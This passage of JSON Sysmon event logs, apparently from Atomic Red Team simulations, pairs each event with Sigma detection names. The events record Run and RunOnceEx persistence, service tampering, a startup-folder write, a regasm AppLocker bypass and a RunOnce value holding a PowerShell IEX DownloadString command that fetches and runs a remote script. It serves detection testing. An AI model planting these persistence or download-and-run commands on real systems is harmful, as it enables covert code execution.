14:44:08.181"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3577,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:08.185344Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start","UtcTime":"2019-07-19 14:44:08.197"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3578,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:08.221461Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ImagePath","UtcTime":"2019-07-19 14:44:08.197"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3579,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:08.240767Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Stop Windows Service"],"event":{"Event":{"EventData":{"CommandLine":"sc.exe stop AtomicTestService","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Service Control Manager Configuration Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF","Image":"C:\\Windows\\System32\\sc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"sc.exe stop AtomicTestService\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D739-5D31-0000-00104CB72600","ParentProcessId":5000,"ProcessGuid":"747F3D96-D739-5D31-0000-0010B6B92600","ProcessId":980,"Product":"Microsoft® Windows® Operating System","RuleName":"Persistence or Exec - Services Management","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:09.172"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3584,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:09.176040Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start","UtcTime":"2019-07-19 14:44:09.291"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3587,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:09.310810Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000002)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start","UtcTime":"2019-07-19 14:44:26.166"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3589,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:26.222431Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ImagePath","UtcTime":"2019-07-19 14:44:26.166"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3590,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:26.246190Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start","UtcTime":"2019-07-19 14:44:47.416"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3592,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:49.679320Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Reg Add RUN Key"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG ADD \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /t REG_SZ /F /D C:\\Path\\AtomicRedTeam.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D765-5D31-0000-001027B72800","ProcessId":6584,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:53.201"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3593,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:53.219598Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Direct Autorun Keys Modification","Reg Add RUN Key"],"event":{"Event":{"EventData":{"CommandLine":"REG ADD \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /t REG_SZ /F /D C:\\Path\\AtomicRedTeam.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG ADD \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /t REG_SZ /F /D C:\\Path\\AtomicRedTeam.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D765-5D31-0000-001027B72800","ParentProcessId":6584,"ProcessGuid":"747F3D96-D765-5D31-0000-001086B92800","ProcessId":2068,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:53.244"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3594,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:53.258049Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Path\\AtomicRedTeam.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D765-5D31-0000-001086B92800","ProcessId":2068,"RuleName":"Persistence - via Run key","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Atomic Red Team","UtcTime":"2019-07-19 14:44:53.261"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3595,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:53.292455Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG DELETE \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /f\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D765-5D31-0000-0010D7BD2800","ProcessId":5824,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:53.314"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3596,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:53.330492Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"REG DELETE \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /f","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG DELETE \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /f\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D765-5D31-0000-0010D7BD2800","ParentProcessId":5824,"ProcessGuid":"747F3D96-D765-5D31-0000-001022C02800","ProcessId":2912,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:53.337"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3597,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:44:53.349171Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Reg Add RUN Key"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \" C:\\Path\\AtomicRedTeam.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D772-5D31-0000-0010BEE52800","ProcessId":3216,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:45:06.056"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3600,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:06.075725Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Direct Autorun Keys Modification","Reg Add RUN Key"],"event":{"Event":{"EventData":{"CommandLine":"REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d C:\\Path\\AtomicRedTeam.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \" C:\\Path\\AtomicRedTeam.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D772-5D31-0000-0010BEE52800","ParentProcessId":3216,"ProcessGuid":"747F3D96-D772-5D31-0000-001010E82800","ProcessId":3772,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:45:06.132"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3601,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:06.137175Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /f\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D772-5D31-0000-001031EB2800","ProcessId":6472,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:45:06.180"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3603,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:06.196458Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /f","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG DELETE HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /f\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D772-5D31-0000-001031EB2800","ParentProcessId":6472,"ProcessGuid":"747F3D96-D772-5D31-0000-001083ED2800","ProcessId":6120,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:45:06.209"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3604,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:06.213488Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"Details":"powershell.exe \"IEX (New-Object Net.WebClient).DownloadString(`\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`\")\"","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ProcessId":3912,"RuleName":"Persistence - via Run key","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\NextRun","UtcTime":"2019-07-19 14:45:19.416"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3607,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:19.483250Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Startup Folder File Write"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-07-18 20:53:13.080","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ProcessId":3912,"RuleName":"","TargetFilename":"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\Notepad.lnk","UtcTime":"2019-07-19 14:45:31.276"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":3609,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:45:31.287863Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U T1121.dll\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 